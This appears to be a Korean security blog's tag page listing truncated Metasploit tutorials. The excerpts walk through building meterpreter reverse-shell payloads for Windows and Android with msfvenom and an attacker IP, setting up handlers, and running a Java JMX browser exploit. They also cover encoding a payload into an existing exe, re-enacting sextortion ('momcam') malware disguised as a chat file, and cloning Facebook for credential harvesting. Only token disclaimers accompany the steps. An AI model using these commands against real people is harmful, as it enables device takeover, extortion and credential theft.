| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
- 휘발성수집
- #휘발성
- z3alous
- 디지털 포렌식 개론
- #휘발성 데이터 수집
- #system
- #라이브 리스폰스
- msf
- forensic
- 포렌식
- volatility
- 모의 해킹
- 볼라틸리티
- 휘발성 데이터
- #포렌식
- Encase
- Memory
- System
- LOB
- #webhacking.kr
- 웹해킹.kr
- Kali
- metasploit
- #lob
- python
- kali linux
- #live response
- msfconsole
- webhacking.kr
- linux
- Today
- 2
- Total
- 97,802
목록metasploit (9)
Lucete
Kali Linux by pass - Hack Windows metasploit tutorial
모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP..
Hack windows with metasploit Java Applet JMX Remote Code Execution
모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지..
요즘 유행 하던 몸캠 (기초방식)
요즘 몸캠이 유행을 했었다. 대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.) 그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :) 이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X 먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgresql 또한 시킨다. 궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다. 그 후 이제 악성코드를 만들어야 하는데...명령어 msfvenom을 이용 하여 만들어 보자.msfvenom -p android/meterpreter/..
모든 사용의 법적 책임은 사용자 본인에게 있습니다. msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe 핸들러에서 프로세스 옮기는 명령어 migrate 프로세스 넘버 ex) migrate 1111
가짜 facebook만들기
모든 법적 책임은 사용자에게 있습니다.연구용으로만 사용하세요. 먼저 Kali linux or parrot linux에서 터미널을 open setoolkit을 입력한다. 입력을 하면 이러한 창을 확인 하실수 있습니다. 여기서 Social-Engineering Attacks를 해야하기 위해 1번을 입력합니다. 다음은 Website Attack Vectors을 위해 2번 여기에선 Credential Harvester Attack Method를 위해 3번 facebook을 만들기 위해 2번을 클릭합니다. 여기까지 하셨으면 반왔습니다. 2번을 하셨으면 IP를 입력하시면 되는데요! ip를 입력하면 이제 clone하기 위한 사이트를 입력하시면 됩니다. 저는 facebook.com을 하기위해 http://faceboo..
msf 이용하기2
포트스캐닝에 관한 이야기를 계속하겠습니다. 앞에서 말한거와 같이 포트스캐닝에는 nmap 같이 유명한 도구가 있습니다. 우리는 msf 보조기능을 이용해보겠습니다. 1. use auxiliary/scanner/smb/smb_version 2. set rhosts 192.168.32.0/24 192.168.32.0/24를 이용해 대역을 스캔하는 것이다. 3. set threads 256 이러게 함으로 run을 할 수 있다. 여기서 조금더 자세히 알고싶고 아이피를 안다면 1. use auxiliary/scanner/netbios/nbname 2. set rhosts IP 3. set threads 256 이렇게 하면 run을 할수 있다. IP대역을 이용하여 mysql 탐색하는 방법 1. use auxiliary..
msfconsole 이용하기
앞에의 글에서는 msfconsole 에서 company_name 을 이용해서 알아 보았다.이번에는 company_name 에서 알아낸 정보를 이용하여 보자. 이를 이용하여 보자 .1. use auxiliary/gather/corpwatch_lookup_id이는 name 처럼 보조기능을 사용하는데 name 대신에 id를 이용하겠다는 것이다. 2. set cw_id cw_40155이렇게 아이디를 지정하준다. 3. set get_history true (true를 생략하니 false로 간주 한다.) 다음은 run run을 하게 되면 cw_id에 입력한 값을 기반으로 검색을 한다. 이러하듯 많은 정보를 얻을 수 있다. 또한 cw_~~~.txt로 저장도 해준다. 다음은 msf에서 보조 기능을 이용하여 포트스캐닝을..